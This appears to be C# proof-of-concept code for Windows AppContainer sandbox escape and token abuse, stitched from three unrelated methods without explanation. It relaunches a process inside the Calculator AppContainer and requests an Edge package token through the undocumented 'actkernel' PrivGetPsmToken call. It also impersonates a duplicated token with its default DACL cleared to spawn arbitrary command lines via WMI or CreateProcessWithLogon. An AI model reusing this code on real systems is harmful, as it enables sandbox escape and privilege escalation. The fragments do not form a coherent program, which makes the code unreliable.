static void Main(string[] args)
{
try
{
if (!IsInAppContainer())
{
if (args.Length > 0)
{
throw new ArgumentException("Already started");
}
Win32ProcessConfig config = new Win32ProcessConfig();
config.ApplicationName = CopyToTempDir();
config.CommandLine = "run abc";
config.AppContainerSid = TokenUtils.DerivePackageSidFromName("microsoft.windowscalculator_8wekyb3d8bbwe");
config.CreationFlags = CreateProcessFlags.NewConsole;
using (var p = Win32Process.CreateProcess(config))
{
p.Process.Wait();
}
}
else
{
Console.WriteLine("In AC");
Console.WriteLine("idiot");
// Spawn an OOP process to init
Guid clsid = new Guid("ce0e0be8-cf56-4577-9577-34cc96ac087c");
Guid iid = new Guid("00000000-0000-0000-c000-000000000046");
CoCreateInstance(ref clsid, IntPtr.Zero, CLSCTX.LOCAL_SERVER, ref iid);
using (var client = new Client())
{
client.Connect("actkernel");
uint res = client.PrivGetPsmToken(0x40000001, 0, "Microsoft.MicrosoftEdge_44.18362.1.0_neutral__8wekyb3d8bbwe",
"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge", out NtToken token, out int a);
if (res != 0)
{
throw new SafeWin32Exception((int)res);
}
using (token)
{
Console.WriteLine("{0} - Handle: {1:X}", token, token.Handle.DangerousGetHandle().ToInt32());
Console.WriteLine("Package Sid: {0}", token.AppContainerSid.Name);
Console.WriteLine("AppId: {0}", token.PackageFullName);
Console.ReadLine();
}
}
}
}
catch (Exception ex)
{
Console.WriteLine(ex);
Console.ReadLine();
}
}
private void btnCreateProcess_Click(object sender, EventArgs e)
{
try
{
if (checkBoxUseWmi.Checked || checkBoxUseNetLogon.Checked)
{
using (var token = _token.DuplicateToken(TokenType.Impersonation, SecurityImpersonationLevel.Impersonation, TokenAccessRights.MaximumAllowed))
{
token.SetDefaultDacl(new Acl(IntPtr.Zero, false));
using (var imp = token.Impersonate())
{
if (checkBoxUseWmi.Checked)
{
using (var managementClass = new ManagementClass(@"\\.\root\cimv2",
"Win32_Process",
new ObjectGetOptions()))
{
var inputParams = managementClass.GetMethodParameters("Create");
inputParams["CommandLine"] = txtCommandLine.Text;
var outParams = managementClass.InvokeMethod("Create",
inputParams,
new InvokeMethodOptions());
}
}
else
{
var config = new Win32ProcessConfig
{
CommandLine = txtCommandLine.Text,
Desktop = @"WinSta0\Default"
};
using (Win32Process.CreateProcessWithLogon("abc", "abc", "abc",
CreateProcessLogonFlags.NetCredentialsOnly | CreateProcessLogonFlags.WithProfile, config))
{
}
}
}
}
}
else
{
using (CreateProcessForToken(txtCommandLine.Text, _token, checkBoxMakeInteractive.Checked))
{
}
}
}
catch (Exception ex)
{
MessageBox.Show(this, ex.Message, "Error", MessageBoxButtons.OK, MessageBoxIcon.Error);
}
}
static bool RestartInAppContainer(string[] args)
{
string FakeFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), "1.txt");
if (!File.Exists(FakeFile))
{
File.WriteAllText(FakeFile, "fake");
}
FixSecurity(Path.GetDirectoryName(typeof(Program).Assembly.Location));
FixSecurity(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures));
List <Sid> caps = new List <Sid>
{
KnownSids.CapabilityInternetClient,
KnownSids.CapabilityInternetClientServer,
KnownSids.CapabilityPrivateNetworkClientServer,
KnownSids.CapabilityPicturesLibrary
};
Win32ProcessConfig config = new Win32ProcessConfig
{
CreationFlags = CreateProcessFlags.NewConsole,
CurrentDirectory = Environment.GetFolderPath(Environment.SpecialFolder.MyPictures),
ApplicationName = mainExe,
CommandLine = mainExe + " " + FakeFile
};
config.SetAppContainerSidFromName("microsoft.windowscalculator_8wekyb3d8bbwe");
config.Capabilities.AddRange(caps);
using (var p = Win32Process.CreateProcess(config))
{
p.Process.Wait();
}
return(true);
}